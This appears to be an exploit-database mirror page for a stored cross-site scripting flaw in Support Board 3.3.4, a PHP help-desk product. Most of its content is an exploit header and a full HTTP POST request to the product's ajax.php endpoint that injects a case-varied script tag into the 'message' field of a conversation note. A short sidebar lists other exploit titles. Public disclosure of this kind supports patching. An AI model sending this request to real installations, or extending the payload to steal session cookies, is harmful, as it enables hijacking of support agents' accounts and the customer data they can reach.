Support board 3.3.4 message stored crosssite scripting (xss) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-10-18 | Type : webapps | Platform : php
This exploit / vulnerability Support board 3.3.4 message stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
# Date: 16/10/2021
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
# Vendor Homepage: https://board.support/
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
# Version: 3.3.4
# Tested on: Ubuntu 20.04.2 LTS, Windows 10

POST /supportboard/include/ajax.php HTTP/1.1
Cookie: [Agent+]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 808
X-Requested-With: XMLHttpRequest
Connection: close

function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false

Support board 3.3.4 message stored crosssite scripting (xss)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Support board 3.3.4 message stored crosssite scripting (xss) Vulnerability / Exploit